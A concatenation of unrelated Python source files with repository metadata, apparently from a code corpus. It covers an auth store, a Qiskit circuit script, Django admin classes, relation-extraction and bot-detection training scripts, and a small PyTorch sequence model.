'client_email', 'price', 'status', 'can_share', 'sharer_email', 'redeemed_at', 'redeemer_id', 'share_code',
'redeemer_email', 'parent_ticket', 'shared_at', 'legal_long_text', 'legal_short_text', 'map_url',
'map_image_url', 'ticket_integration', 'entrance', 'row', 'section', 'price_code', 'external_customer_ref',
'venue', 'event', 'event_date', 'currency', 'external_card_ref', 'additional_fields'
)
for field in fields:
if getattr(self, field) != getattr(other, field):
if field == 'additional_fields' and getattr(other, field):
if getattr(self, field):
additional_fields = []
for current in getattr(other, field):
for new in getattr(self, field):
if current['sort'] == new['sort']:
for key in current.keys():
current[key] = new[key]
additional_fields.append(current)
differences[field] = additional_fields
else:
differences[field] = getattr(self, field)
return differences
| 33.538847 | 119 | 0.555747 |
3b75c9e21a59f06a0a71ac339b153e617a2a809f | 2,228 | py | Python | Store/AuthStore.py | uscope-platform/uscope_server | d8679c1aea0210ed80375a2b071b5971ce7a7232 | [
"Apache-2.0"
] | null | null | null | Store/AuthStore.py | uscope-platform/uscope_server | d8679c1aea0210ed80375a2b071b5971ce7a7232 | [
"Apache-2.0"
] | null | null | null | Store/AuthStore.py | uscope-platform/uscope_server | d8679c1aea0210ed80375a2b071b5971ce7a7232 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 University of Nottingham Ningbo China
# Author: Filippo Savi <filssavi@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime as dt
from sqlalchemy.orm import declarative_base, sessionmaker
from sqlalchemy import create_engine
from .Elements import Users
class AuthStore:
def __init__(self, host):
self.engine = create_engine(host)
Base = declarative_base()
Base.metadata.create_all(self.engine)
self.Session = sessionmaker(bind=self.engine)
self.auth_db = Users.AuthenticationDatabase(self.Session)
# PERIPHERALS
def get_users_list(self):
return self.auth_db.get_users_list()
def add_user(self, content):
self.auth_db.add_user(content['username'], content['pw_hash'], content['role'])
def user_exists(self, username):
self.auth_db.user_exists(username)
def get_password_hash(self, username):
return self.auth_db.get_password_hash(username)
def get_user(self, username):
return self.auth_db.get_user(username)
def remove_user(self, username):
self.auth_db.remove_user(username)
def get_token(self, selector):
token = self.auth_db.get_token(selector)
return {'username': token.username, 'expiry': token.expiry.timestamp(), 'validator': token.validator}
def add_token(self, selector, token_obj):
timestamp = dt.datetime.fromtimestamp(token_obj['expiry'])
self.auth_db.add_token(token_obj['username'], timestamp, token_obj['validator'], selector)
def dump(self):
return self.auth_db.dump()
def restore(self, data):
self.auth_db.restore(data)
def remove_token(self, username):
pass
| 31.828571 | 109 | 0.714542 |
f176e0af78a2811b7765aecca020ed3f225299c3 | 3,134 | py | Python | data/p2DJ/New/program/qiskit/class/startQiskit_Class199.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p2DJ/New/program/qiskit/class/startQiskit_Class199.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | data/p2DJ/New/program/qiskit/class/startQiskit_Class199.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=2
# total number=11
import cirq
import qiskit
from qiskit import IBMQ
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename='circuit/deutsch-oracle.png')
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n, "qc")
target = QuantumRegister(1, "qt")
prog = QuantumCircuit(input_qubit, target)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(target)
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[1]) # number=1
prog.cx(input_qubit[0],input_qubit[1]) # number=2
prog.h(input_qubit[1]) # number=8
prog.cz(input_qubit[0],input_qubit[1]) # number=9
prog.h(input_qubit[1]) # number=10
prog.cx(input_qubit[0],input_qubit[1]) # number=7
prog.h(target)
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [target])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
prog.x(input_qubit[0]) # number=3
prog.y(input_qubit[1]) # number=6
prog.x(input_qubit[0]) # number=4
# circuit end
return prog
if __name__ == '__main__':
n = 2
f = lambda rep: rep[-1]
# f = lambda rep: "1" if rep[0:2] == "01" or rep[0:2] == "10" else "0"
# f = lambda rep: "0"
prog = make_circuit(n, f)
sample_shot =2800
backend = BasicAer.get_backend('statevector_simulator')
circuit1 = transpile(prog,FakeVigo())
circuit1.x(qubit=3)
circuit1.x(qubit=3)
prog = circuit1
info = execute(prog, backend=backend).result().get_statevector()
qubits = round(log2(len(info)))
info = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
writefile = open("../data/startQiskit_Class199.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 28.234234 | 80 | 0.619336 |
81b34f027b43532d60ef240b15a2b0a834d30265 | 4,135 | py | Python | iquhack/admin.py | mwalsh161/iquise-website | ab674d7881e418fe02b533ae477982e328e8fec7 | [
"MIT"
] | null | null | null | iquhack/admin.py | mwalsh161/iquise-website | ab674d7881e418fe02b533ae477982e328e8fec7 | [
"MIT"
] | 14 | 2018-08-23T23:54:37.000Z | 2020-04-29T23:44:18.000Z | iquhack/admin.py | mwalsh161/iquise-website | ab674d7881e418fe02b533ae477982e328e8fec7 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from django.contrib import admin
from django.urls import reverse
from django.shortcuts import redirect
from django.db import transaction
from django.utils.safestring import mark_safe
from .models import (
Hackathon,
Sponsor,
Tier,
Sponsorship,
Section,
SectionTemplate,
Attachment,
FAQ,
UsedFAQ,
Application,
Guardian,
Profile,
Address,
)
class SponsorshipInline(admin.TabularInline):
model = Sponsorship
extra = 1
class SectionInline(admin.TabularInline):
model = Section
verbose_name_plural = "Sections (Follow change link to edit attachments)"
extra = 1
show_change_link = True
class AttachmentInline(admin.TabularInline):
model = Attachment
extra = 1
class FAQInline(admin.TabularInline):
model = UsedFAQ
verbose_name_plural = "FAQs"
extra = 1
class HackathonAdmin(admin.ModelAdmin):
list_display = ("__unicode__", "end_date", "published", "open")
fieldsets = (
(None, {
"fields": ("start_date", "end_date", "back_drop_image", "organizing_committee", "published")
}),
("Sponsor Logos", {
"description": "Platform sponsors will use these directly. Sponsor Tiers will compute their absolute value relative to these.",
"fields": ("logo_max_height", "logo_max_side_margin", "logo_max_bottom_margin")
}),
("Registration", {
"fields": ("app_questions", "opens", "deadline", "early_note", "open_note", "closed_note")
}),
)
inlines = (SponsorshipInline, FAQInline, SectionInline)
class SectionAdmin(admin.ModelAdmin):
list_display = ("__unicode__", "hackathon")
list_filter = ("hackathon",)
inlines = (AttachmentInline,)
class AttachmentAdmin(admin.ModelAdmin):
list_display = ("__unicode__", "section")
list_filter = ("section",)
class FAQAdmin(admin.ModelAdmin):
list_display = ("__unicode__", "general")
list_filter = ("general", )
def accept(modeladmin, request, queryset):
with transaction.atomic():
for app in queryset:
app.accept()
return redirect(reverse("admin:iquhack_application_changelist"))
accept.short_description = "Accept selected applications"
class ApplicationAdmin(admin.ModelAdmin):
list_display = ("__unicode__", "hackathon")
list_filter = ("hackathon", "accepted")
readonly_fields = ("user", "hackathon", "accepted")
search_fields = ("user__email", "user__first_name", "user__last_name", "responses")
actions = (accept, )
def get_form(self, request, obj=None, **kwargs):
if obj:
help_texts = {
"user": mark_safe("<a href=%s>Go to user profile</a>"%reverse("admin:auth_user_change", args=[obj.user.id])),
"hackathon": mark_safe("<a href=%s>Go to hackathon</a>"%reverse("admin:iquhack_hackathon_change", args=[obj.hackathon.id])),
}
kwargs.update({"help_texts": help_texts})
return super(ApplicationAdmin, self).get_form(request, obj, **kwargs)
class GuardianInline(admin.TabularInline):
model = Guardian
extra = 1
class ProfileAdmin(admin.ModelAdmin):
search_fields = ("user__email", "user__first_name", "user__last_name")
inlines = (GuardianInline, )
def get_form(self, request, obj=None, **kwargs):
if obj:
help_texts = {
"user": mark_safe("<a href=%s>Go to user profile</a>"%reverse("admin:auth_user_change", args=[obj.user.id])),
}
kwargs.update({"help_texts": help_texts})
return super(ProfileAdmin, self).get_form(request, obj, **kwargs)
admin.site.register(Hackathon, HackathonAdmin)
admin.site.register(Sponsor)
admin.site.register(Tier)
admin.site.register(FAQ, FAQAdmin)
admin.site.register(Section, SectionAdmin)
admin.site.register(SectionTemplate)
admin.site.register(Attachment, AttachmentAdmin)
admin.site.register(Application, ApplicationAdmin)
admin.site.register(Guardian)
admin.site.register(Profile, ProfileAdmin)
admin.site.register(Address) | 32.81746 | 140 | 0.679807 |
0a571d96f60adf6a274a12cdee2a1205e32bb721 | 9,681 | py | Python | example/redn_trainer.py | yjc9696/REDN | 132c78ef290a30e93c0c4c6738ae9c1520241a2b | [
"MIT"
] | null | null | null | example/redn_trainer.py | yjc9696/REDN | 132c78ef290a30e93c0c4c6738ae9c1520241a2b | [
"MIT"
] | 1 | 2021-06-02T02:09:52.000Z | 2021-06-02T02:09:52.000Z | example/redn_trainer.py | yjc9696/REDN | 132c78ef290a30e93c0c4c6738ae9c1520241a2b | [
"MIT"
] | null | null | null | # coding:utf-8
import torch
import json
import sys
from torch.utils.data import DataLoader
import os
import pickle
import random
sys.path.append("/")
from opennre import encoder, model, framework
from opennre.framework.data_loader import SentenceREDataset
from opennre.framework.f1_metric import F1Metric
from example import configs as cf
from opennre.model.para_loss import PARALoss
from opennre.model.para_loss_softmax import PARALossSoftmax
import os
def train(dataset_name, batch_size=50, num_workers=2, max_epoch=15, lr=3e-5, weight_decay=1e-5, add_subject_loss=False,
eval=False, continue_train=False, large_bert=False, subject_1=False, use_cls=True, softmax=False,
opt='adam', seed=31415926535897932, cuda_device=0, sort=True, metric="micro_f1"
):
print("@@@@@@@@@@@ args @@@@@@@@@@@")
print(locals())
print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
os.environ["CUDA_VISIBLE_DEVICES"] = str(cuda_device)
if seed is not None:
torch.manual_seed(seed)
root_path = cf.rootpath
dataset_file = ["train.txt", "val.txt", "test.txt"]
dataset_pkl_file = ["train.pkl", "val.pkl", "test.pkl"]
if large_bert:
bert_path, bert_large = cf.modelpath, True
else:
bert_path, bert_large = cf.modelpath, False
ckpt = './ckpt/%s_%s_%s_%s_%s_%s_bert.th' % (
cf.outputname,
dataset_name,
"softmax" if softmax else "sigmoid",
"withCLS" if use_cls else "withoutCLS",
"-1" if subject_1 else "-2",
"1024" if bert_large else "768",)
def get_dataset(_model):
if all(map(lambda x: os.path.exists(os.path.join(root_path, dataset_name, x)), dataset_pkl_file)):
dataset = list(
map(lambda x: pickle.load(open(os.path.join(root_path, dataset_name, x), "rb")), dataset_pkl_file))
if softmax:
list(map(lambda x: x.split(), dataset))
else:
dataset = list(
map(lambda x: SentenceREDataset(path=os.path.join(root_path, dataset_name, x), rel2id=rel2id,
tokenizer=_model.sentence_encoder.tokenize, kwargs=None,
sort=sort),
dataset_file))
list(map(lambda x, y: pickle.dump(x, open(os.path.join(root_path, dataset_name, y), "wb")), dataset,
dataset_pkl_file))
if dataset_name in ["nyt10", "nyt10_1", "nyt10_2"]:
list(map(lambda x: x.set_max_words(100), dataset))
list(map(lambda x: x.remove_na(), dataset))
# list(map(lambda x: x.remove_repeat(), dataset))
list(map(lambda x: x.char_idx_to_word_idx(), dataset))
for d in dataset:
d.NA_id = -1
if dataset_name in ["semeval_1"]:
for d in dataset:
d.NA_id = -1
if dataset_name in ["webnlg", "webnlg_1"]:
for d in dataset:
d.NA_id = -1
dataset_loader = list(map(
lambda x: DataLoader(dataset=x, batch_size=batch_size, shuffle=False, pin_memory=True,
num_workers=num_workers, collate_fn=SentenceREDataset.collate_fn), dataset))
return dataset_loader
rel2id = json.load(open(os.path.join(root_path, dataset_name, 'rel2id.json')))
sentence_encoder = encoder.BERTHiddenStateEncoder(pretrain_path=bert_path)
_model = model.PARA(sentence_encoder, len(rel2id), rel2id, num_token_labels=2, subject_1=subject_1, use_cls=use_cls)
train_loader, val_loader, test_loader = get_dataset(_model)
_framework = framework.SentenceRE(
train_loader=train_loader,
val_loader=val_loader if dataset_name not in ["nyt10", "nyt10_1"] else test_loader,
test_loader=test_loader,
model=_model,
ckpt=ckpt,
max_epoch=max_epoch,
lr=lr,
weight_decay=weight_decay,
opt=opt,
add_subject_loss=add_subject_loss,
loss_func=PARALossSoftmax() if softmax else PARALoss(),
metric=F1Metric(multi_label=not softmax,
na_id=train_loader.dataset.NA_id,
ignore_na=dataset_name == "semeval",
rel2id=rel2id,
print_error_prob=1
),
)
if not eval:
if continue_train:
_framework.parallel_model.load_state_dict(torch.load(ckpt).state_dict())
_framework.train_model(metric=metric)
_framework.parallel_model.load_state_dict(torch.load(ckpt).state_dict())
# print("TRAIN---------------------------")
# result = _framework.eval_model(_framework.train_loader)
# print('Accuracy on test set: {}'.format(result['acc']))
# print('Micro Precision: {}'.format(result['micro_p']))
# print('Micro Recall: {}'.format(result['micro_r']))
# print('Micro F1: {}'.format(result['micro_f1']))
#
# print("DEV---------------------------")
# result = _framework.eval_model(_framework.val_loader)
# print('Accuracy on test set: {}'.format(result['acc']))
# print('Micro Precision: {}'.format(result['micro_p']))
# print('Micro Recall: {}'.format(result['micro_r']))
# print('Micro F1: {}'.format(result['micro_f1']))
print("TEST---------------------------")
result = _framework.eval_model(_framework.test_loader)
print('Accuracy on test set: {}'.format(result['acc']))
print('Micro Precision: {}'.format(result['micro_p']))
print('Micro Recall: {}'.format(result['micro_r']))
print('Micro F1: {}'.format(result['micro_f1']))
if os.path.exists(os.path.join(root_path, dataset_name, "test_sample.json")):
test_sample_dataset = SentenceREDataset(path=os.path.join(root_path, dataset_name, "test_sample.json"), rel2id=rel2id,
tokenizer=_model.sentence_encoder.tokenize, kwargs=None,
sort=sort)
test_sample_loader = DataLoader(dataset=test_sample_dataset, batch_size=batch_size, shuffle=False, pin_memory=True,
num_workers=num_workers, collate_fn=SentenceREDataset.collate_fn)
print("TEST-Sample--------------------")
result = _framework.eval_model(test_sample_loader)
print('Accuracy on test set: {}'.format(result['acc']))
print('Micro Precision: {}'.format(result['micro_p']))
print('Micro Recall: {}'.format(result['micro_r']))
print('Micro F1: {}'.format(result['micro_f1']))
_framework.metric.df.to_excel(os.path.join(root_path, dataset_name, "res.xlsx"))
def get_ablation_args(dataset, max_epoch, batch_size, **kwargs):
_args_list = []
args = {"dataset_name": dataset, "max_epoch": max_epoch, "batch_size": batch_size,
"subject_1": False, "use_cls": True, "softmax": False, }
args.update(kwargs)
_args_list.append(args.copy())
args["subject_1"] = True
_args_list.append(args.copy())
args["use_cls"] = False
_args_list.append(args.copy())
args["softmax"] = True
_args_list.append(args.copy())
return _args_list
if __name__ == '__main__':
dataset_name = sys.argv[1]
is_train = sys.argv[2] == "t"
task_id = None
if len(sys.argv) > 3:
task_id = int(sys.argv[3])
print("==========%s %s============" % (dataset_name, str(task_id)))
if dataset_name in ["semeval", "semeval_1"]:
max_epoch = 50
batch_size = 32
args_list = get_ablation_args(dataset_name,
max_epoch=max_epoch,
batch_size=batch_size,
cuda_device=1,
# continue_train=True,
# seed=None,
eval=not is_train,
)
train(**args_list[0])
elif dataset_name in ["nyt10", "nyt10_1", "nyt10_2"]:
max_epoch = 100
batch_size = 20
args_list = get_ablation_args(dataset_name,
max_epoch=max_epoch,
batch_size=batch_size,
cuda_device=3,
lr=5e-5,
sort=False,
eval=not is_train,
)
train(**args_list[0])
elif dataset_name in ["webnlg_orig", "webnlg", "webnlg_orig_1"]:
max_epoch = 30
batch_size = 20
args_list = get_ablation_args(dataset_name,
max_epoch=max_epoch,
batch_size=batch_size,
sort=False,
cuda_device=3,
continue_train=False,
eval=not is_train,
)
train(**args_list[0])
elif dataset_name in ["ske"]:
max_epoch = 30
batch_size = 20
args_list = get_ablation_args(dataset_name,
max_epoch=max_epoch,
batch_size=batch_size,
sort=False,
cuda_device=0,
continue_train=False,
eval=not is_train,
)
train(**args_list[0])
| 41.909091 | 126 | 0.551389 |
7c96ce015a2d667da4d24423f4c760b40a7162ed | 5,460 | py | Python | src/vak/models/teenytweetynet.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 26 | 2019-03-04T20:08:57.000Z | 2022-01-22T13:40:00.000Z | src/vak/models/teenytweetynet.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 379 | 2019-03-03T12:16:05.000Z | 2022-03-29T13:44:46.000Z | src/vak/models/teenytweetynet.py | jspaaks/vak | 581ec4869d342e5d52bc057de54c10901f06d343 | [
"BSD-3-Clause"
] | 12 | 2019-11-22T21:19:19.000Z | 2022-03-14T17:44:59.000Z | import torch
from torch import nn
from ..engine.model import Model
# absolute import to avoid name clash in model def below
import vak.metrics
class TeenyTweetyNet(nn.Module):
def __init__(
self,
num_classes,
input_shape=(1, 513, 88),
conv1_filters=8,
conv1_kernel_size=(5, 5),
conv1_padding=(0, 2),
conv2_filters=16,
conv2_kernel_size=(5, 5),
conv2_padding=(0, 2),
pool1_size=(8, 1),
pool1_stride=(8, 1),
pool2_size=(8, 1),
pool2_stride=(8, 1),
hidden_size=64,
):
"""TeenyTweetyNet model
Parameters
----------
num_classes : int
number of classes to predict, e.g., number of syllable classes in an individual bird's song
input_shape : tuple
with 3 elements corresponding to dimensions of spectrogram windows: (channels, frequency bins, time bins).
i.e. we assume input is a spectrogram and treat it like an image, typically with one channel,
the rows are frequency bins, and the columns are time bins. Default is (1, 513, 88).
conv1_filters : int
Number of filters in first convolutional layer. Default is 32.
conv1_kernel_size : tuple
Size of kernels, i.e. filters, in first convolutional layer. Default is (5, 5).
conv2_filters : int
Number of filters in second convolutional layer. Default is 64.
conv2_kernel_size : tuple
Size of kernels, i.e. filters, in second convolutional layer. Default is (5, 5).
pool1_size : two element tuple of ints
Size of sliding window for first max pooling layer. Default is (1, 8)
pool1_stride : two element tuple of ints
Step size for sliding window of first max pooling layer. Default is (1, 8)
pool2_size : two element tuple of ints
Size of sliding window for second max pooling layer. Default is (1, 8),
pool2_stride : two element tuple of ints
Step size for sliding window of second max pooling layer. Default is (1, 8)
"""
super().__init__()
self.num_classes = num_classes
self.input_shape = input_shape
self.hidden_size = hidden_size
self.cnn = nn.Sequential(
nn.Conv2d(
in_channels=self.input_shape[0],
out_channels=conv1_filters,
kernel_size=conv1_kernel_size,
padding=conv1_padding,
),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=pool1_size, stride=pool1_stride),
nn.Conv2d(
in_channels=conv1_filters,
out_channels=conv2_filters,
kernel_size=conv2_kernel_size,
padding=conv2_padding,
),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=pool2_size, stride=pool2_stride),
)
# determine number of features in output after stacking channels
# we use the same number of features for hidden states
# note self.num_hidden is also used to reshape output of cnn in self.forward method
batch_shape = tuple((1,) + input_shape)
tmp_tensor = torch.rand(batch_shape)
tmp_out = self.cnn(tmp_tensor)
channels_out, freqbins_out = tmp_out.shape[1], tmp_out.shape[2]
self.num_rnn_features = channels_out * freqbins_out
self.rnn = nn.LSTM(
input_size=self.num_rnn_features,
hidden_size=self.hidden_size,
num_layers=1,
dropout=0,
bidirectional=True,
)
# for self.fc, in_features = hidden_size * 2, because LSTM is bidirectional
# so we get hidden forward + hidden backward as output
self.fc = nn.Linear(self.hidden_size * 2, num_classes)
def forward(self, x):
features = self.cnn(x)
# stack channels so that dimension order is (batch, num_rnn_features, num time bins)
features = features.view(features.shape[0], self.num_rnn_features, -1)
# now switch dimensions for feeding to rnn,
# so dimension order is (num time bins, batch size, num_rnn_features)
features = features.permute(2, 0, 1)
rnn_output, (hidden, cell_state) = self.rnn(features)
# permute back to (batch, time bins, features)
# so we can project features down onto number of classes
rnn_output = rnn_output.permute(1, 0, 2)
logits = self.fc(rnn_output)
# permute yet again
# so that dimension order is (batch, classes, time steps)
# because this is order that loss function expects
return logits.permute(0, 2, 1)
class TeenyTweetyNetModel(Model):
@classmethod
def from_config(cls, config, logger=None):
network = TeenyTweetyNet(**config["network"])
loss = nn.CrossEntropyLoss(**config["loss"])
optimizer = torch.optim.Adam(params=network.parameters(), **config["optimizer"])
metrics = {
"acc": vak.metrics.Accuracy(),
"levenshtein": vak.metrics.Levenshtein(),
"segment_error_rate": vak.metrics.SegmentErrorRate(),
"loss": torch.nn.CrossEntropyLoss(),
}
return cls(
network=network,
optimizer=optimizer,
loss=loss,
metrics=metrics,
logger=logger,
)
| 40.147059 | 118 | 0.614469 |
3e2060b9f86ce24a2b67624846bb0789c28cde45 | 5,643 | py | Python | exp1_bot_detection/Yang/Yang.py | GabrielHam/SATAR_Twitter_Bot_Detection_with_Self-supervised_User_Representation_Learning | ac73e5deb9d748f02d1396d1458e716408470cc9 | [
"MIT"
] | 5 | 2021-08-10T14:15:18.000Z | 2022-03-09T07:06:19.000Z | exp1_bot_detection/Yang/Yang.py | GabrielHam/SATAR_Twitter_Bot_Detection_with_Self-supervised_User_Representation_Learning | ac73e5deb9d748f02d1396d1458e716408470cc9 | [
"MIT"
] | null | null | null | exp1_bot_detection/Yang/Yang.py | GabrielHam/SATAR_Twitter_Bot_Detection_with_Self-supervised_User_Representation_Learning | ac73e5deb9d748f02d1396d1458e716408470cc9 | [
"MIT"
] | null | null | null | import os
from sklearn.ensemble import RandomForestClassifier
import joblib
import datetime
import time
IDList = []
labelList = []
with open('finalList.txt', 'r', encoding = 'utf-8') as f:
for line in f:
IDList.append(line.split()[1])
labelList.append(line.split()[2])
print('load done')
featuretext = ['statuses_count', 'followers_count', 'friends_count', 'favourites_count',
'listed_count', 'default_profile', 'profile_use_background_image', 'verified']
def loaddata(file):
data = []
with open(file, 'r', encoding = 'utf-8') as f:
for line in f:
data.append(line.split()[0])
return data
trainList = loaddata('listTrain.txt')
developList = loaddata('listDev.txt')
testList = loaddata('listTest.txt')
print('load done')
traindata = []
trainlabel = []
devdata = []
devlabel = []
testdata = []
testlabel = []
def calchours(data):
dict = {'Jan':1, 'Feb':2, 'Mar':3, 'Apr':4, 'May':5,
'Jun':6, 'Jul':7, 'Aug':8, 'Sep':9, 'Oct':10,
'Nov':11, 'Dec':12}
tmp = data['created_at'].split()
year = int(tmp[5])
month = dict[tmp[1]]
day = int(tmp[2])
hour = int(tmp[3].split(':')[0])
minute = int(tmp[3].split(':')[1])
second = int(tmp[3].split(':')[2])
date1 = datetime.datetime(year, month, day, hour, minute, second)
date2 = datetime.datetime(2020, 8, 20, 17, 0, 0)
return (date2 - date1).days * 24.0 + int((date2 - date1).seconds / 3600.0)
def calcnum(data):
cnt = 0
for index in range(len(data)):
if data[index] >= '0' and data[index] <= '9':
cnt += 1
return cnt
def calclen(data):
cnt = 0
for word in data:
cnt += len(word)
return cnt
unigram = {}
with open('unigram.txt', 'r', encoding = 'utf-8') as f:
for line in f:
unigram[line.split()[0]] = int(line.split()[1])
bigram = {}
with open('bigram.txt', 'r', encoding = 'utf-8') as f:
for line in f:
word = (line.split()[0], line.split()[1])
bigram[word] = int(line.split()[2])
print('gram load done')
def calclikely(data):
ans = 1
for index in range(len(data) - 1):
word0 = data[index]
word1 = data[index+1]
try:
tmp = bigram[(word0, word1)] / unigram[word0]
except:
tmp = 0
ans = ans * tmp
ans = ans ** (1 / (len(data) - 1))
return ans
cnt = 0
for index in range(len(IDList)):
cnt += 1
if cnt % 1000 == 0:
print(cnt)
ID = IDList[index]
label = labelList[index]
data = []
with open('profile/' + ID + '_pro.txt', 'r', encoding = 'utf-8') as f:
for line in f:
data.append(line.strip())
user = {}
for i in range(int(len(data) / 2)):
user[data[i*2]] = data[i*2+1]
feature = []
user_age = calchours(user)
feature.append(int(user['statuses_count']) / user_age)
feature.append(int(user['followers_count']) / user_age)
feature.append(int(user['friends_count']) / user_age)
feature.append(int(user['favourites_count']) / user_age)
feature.append(int(user['listed_count']) / user_age)
feature.append(int(user['followers_count']) / max(1, int(user['friends_count'])))
feature.append(len(user['screen_name']))
feature.append(calcnum(user['screen_name']))
feature.append(len(user['name']))
feature.append(calcnum(user['name']))
feature.append(calclen(user['description']))
feature.append(calclikely(user['screen_name']))
for key in user:
if user[key] == '' or user[key] == 'NULL' or user[key] == 'False':
user[key] = '0'
if user[key] == 'True':
user[key] = '1'
for key in featuretext:
feature.append(int(user[key]))
with open('feature.txt', 'a', encoding = 'utf-8') as f:
f.write(ID + ' ')
for key in feature:
f.write(str(key) + ' ')
f.write('\n')
if ID in trainList:
traindata.append(feature)
trainlabel.append(label)
elif ID in developList:
devdata.append(feature)
devlabel.append(label)
elif ID in testList:
testdata.append(feature)
testlabel.append(label)
print('load done')
print(len(testdata))
def Metric(truth, pred):
TP = 0
FP = 0
TN = 0
FN = 0
for i in range(len(truth)):
if truth[i] == '1' and pred[i] == '1':
TP += 1
elif truth[i] == '0' and pred[i] == '1':
FP += 1
elif truth[i] == '0' and pred[i] == '0':
TN += 1
elif truth[i] == '1' and pred[i] == '0':
FN += 1
acc = (TP + TN) / (TP + FP + TN + FN)
precision = TP / (TP + FP)
recall = TP / (TP + FN)
specificity = TN / (TN + FP)
F1 = 2 / (recall ** -1 + precision ** -1)
MCC = (TP * TN - FP * FN) / ((TP + FP) * (TP + FN) * (TN + FP) * (TN + FN)) ** 0.5
print('precision:', precision)
print('recall:', recall)
print('specificity:', specificity)
print('F1:', F1)
print('MCC:', MCC)
print('acc:', acc)
return acc
clf = RandomForestClassifier(random_state=0, max_depth = 10, verbose = True)
print('training start')
clf.fit(traindata, trainlabel)
print('train end')
devpred = clf.predict(devdata)
testpred = clf.predict(testdata)
print('dev data')
dev_acc = Metric(devlabel, devpred)
print('test data')
test_acc = Metric(testlabel, testpred)
joblib.dump(clf, 'models/model_' + str(int(dev_acc * 10000)) + '_' + str(int(test_acc * 10000)) + '.m') | 33 | 103 | 0.551834 |
082e32c506a4a55180dcedb5a1c87f250b1bc07f | 4,500 | py | Python | stem_cell_hypothesis/zh_albert_base/single/dep.py | emorynlp/stem-cell-hypothesis | 48a628093d93d653865fbac6409d179cddd99293 | [
"Apache-2.0"
] | 4 | 2021-09-17T15:23:31.000Z | 2022-02-28T10:18:04.000Z | stem_cell_hypothesis/zh_albert_base/single/dep.py | emorynlp/stem-cell-hypothesis | 48a628093d93d653865fbac6409d179cddd99293 | [
"Apache-2.0"
] | null | null | null | stem_cell_hypothesis/zh_albert_base/single/dep.py | emorynlp/stem-cell-hypothesis | 48a628093d93d653865fbac6409d179cddd99293 | [
"Apache-2.0"
] | null | null | null | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2021-01-06 16:12
from typing import List
from elit.common.dataset import SortingSamplerBuilder
from elit.common.transform import NormalizeToken
from elit.components.mtl.multi_task_learning import MultiTaskLearning
from elit.components.mtl.tasks.constituency import CRFConstituencyParsing
from elit.components.mtl.tasks.dep import BiaffineDependencyParsing
from elit.components.mtl.tasks.ner.biaffine_ner import BiaffineNamedEntityRecognition
from elit.components.mtl.tasks.pos import TransformerTagging
from elit.components.mtl.tasks.srl.rank_srl import SpanRankingSemanticRoleLabeling
from elit.datasets.parsing.ptb import PTB_TOKEN_MAPPING
from elit.datasets.srl.ontonotes5.chinese import ONTONOTES5_POS_CHINESE_TRAIN, ONTONOTES5_POS_CHINESE_TEST, \
ONTONOTES5_POS_CHINESE_DEV, ONTONOTES5_CHINESE_TRAIN, ONTONOTES5_CHINESE_TEST, ONTONOTES5_CHINESE_DEV, \
ONTONOTES5_CON_CHINESE_TRAIN, ONTONOTES5_CON_CHINESE_DEV, ONTONOTES5_CON_CHINESE_TEST, ONTONOTES5_DEP_CHINESE_TEST, \
ONTONOTES5_DEP_CHINESE_DEV, ONTONOTES5_DEP_CHINESE_TRAIN
from elit.layers.embeddings.contextual_word_embedding import ContextualWordEmbedding
from elit.metrics.mtl import MetricDict
from elit.utils.log_util import cprint
from stem_cell_hypothesis import cdroot
def main():
cdroot()
scores: List[MetricDict] = []
for i in range(3):
tasks = {
# 'pos': TransformerTagging(
# ONTONOTES5_POS_CHINESE_TRAIN,
# ONTONOTES5_POS_CHINESE_DEV,
# ONTONOTES5_POS_CHINESE_TEST,
# SortingSamplerBuilder(batch_size=64, batch_max_tokens=6400),
# lr=1e-3,
# ),
# 'ner': BiaffineNamedEntityRecognition(
# ONTONOTES5_CHINESE_TRAIN,
